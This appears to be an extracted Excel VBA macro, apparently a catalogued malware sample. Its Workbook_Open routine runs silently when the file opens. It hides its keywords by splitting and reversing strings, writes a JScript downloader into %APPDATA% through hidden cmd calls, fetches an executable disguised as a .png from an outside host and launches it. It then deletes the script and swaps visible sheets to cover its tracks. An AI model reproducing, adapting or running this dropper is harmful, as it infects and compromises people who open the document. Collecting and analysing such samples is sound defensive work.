Attribute VB_Name = "Module1"
Attribute VB_Name = "|fffd||fffd||fffd||fffd|1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "|fffd||fffd||fffd||fffd|2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "|fffd||fffd||fffd||fffd||fffd||fffd||fffd||fffd|"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
On Error Resume Next
If ActiveSheet.Name = "Total" Then Exit Sub
FF = "ope" & "n"
Hoker = "echo  var " & "oAD" & "OStream = Create"
heko = "Object(""ADO"" + ""DB.Strea"" + ""m""); >> 74.js"
FU = "=""%""^&""AP" & "P" & "D" & "AT" & "A%\\"";"

A = "cmd /c cd ""%appdata%"" &echo (function (Global){ >> 74.js &echo var dwlpath" & FU & "  >> 74.js &echo var dwlfile=""tpys.exe""; >> 74.js &echo var Url=""http://disk.karelia.pro/vNwvf27/309.png""; >> 74.js &echo function CreateObject(ProgId) >> 74.js &echo { >> 74.js &echo  return new ActiveXObject(ProgId); >> 74.js &echo } >> 74.js &echo var FSO = fso = CreateObject(""Scripting.FileSystemObject""); >> 74.js &echo var WshShell = CreateObject(""WScript.Shell""); >> 74.js &echo function isFile(Path) >> 74.js &echo { >> 74.js &"
B = "echo  return fso.FileExists(Path); >> 74.js &echo } >> 74.js &echo function DeleteFile(Path) >> 74.js &echo { >> 74.js &echo  try  >> 74.js &echo  { >> 74.js &echo   if (isFile(Path)) >> 74.js &echo   FSO.GetFile(Path).Delete(true); >> 74.js &echo  } catch (e) {} >> 74.js &echo } >> 74.js &echo function DownloadFileFromURL(Url, FileDest) >> 74.js &echo { >> 74.js &echo  var msx = ""Msxml2""; >> 74.js &echo  ^if (!FileDest || !Url) return null; >> 74.js &echo  var ge = ""GE""; >> 74.js &echo  FileDest = WshShell.ExpandEnvironmentStrings(FileDest); >> 74.js &echo  msx = msx + "".XMLHTTP""; >> 74.js &echo  DeleteFile(FileDest); >> 74.js &echo  var oXMLHTTP = WScript.CreateObject(msx); >> 74.js &echo  oXMLHTTP." & FF & "(ge + ""T"", Url, false); >> 74.js &echo  oXMLHTTP.send(null); >> 74.js &" & Hoker & heko & "&echo  with (oADOStream){ >> 74.js &echo      Mode = 3; >> 74.js &echo      Type = 1; >> 74.js &echo     Open() >> 74.js &echo    Write (oXMLHTTP." & StrReverse(")ydoBesnopser") & "; >> 74.js &"""
C = "cmd /c ping localhost & cd ""%appdata%"" &  echo      SaveToFile(FileDest, 2); >> 74.js &echo      Close(); >> 74.js &echo      return FileDest; >> 74.js &echo  } >> 74.js &echo } >> 74.js &echo  try  >> 74.js &echo  { >> 74.js &echo  FSO.GetFile(WshShell.ExpandEnvironmentStrings(""%""^&""APPDATA%\\://"")); >> 74.js &echo  } catch (e) >> 74.js &echo  { >> 74.js &echo  DownloadFileFromURL(Url,dwlpath+dwlfile); >> 74.js &echo  } >> 74.js &echo })(this) >> 74.js &74.js & ping localhost -n 5 & del 74.js & start 0tpys.exe"""
Shell A & B, vbHide
Shell C, vbHide

Set MainSheet = Application.ThisWorkbook.Sheets("Total")
Set StartSheet = Application.ThisWorkbook.Sheets("Warning")
MainSheet.Visible = True
StartSheet.Visible = xlVeryHide

ActiveWorkbook.Save



End Sub


INQUEST-PP=macro
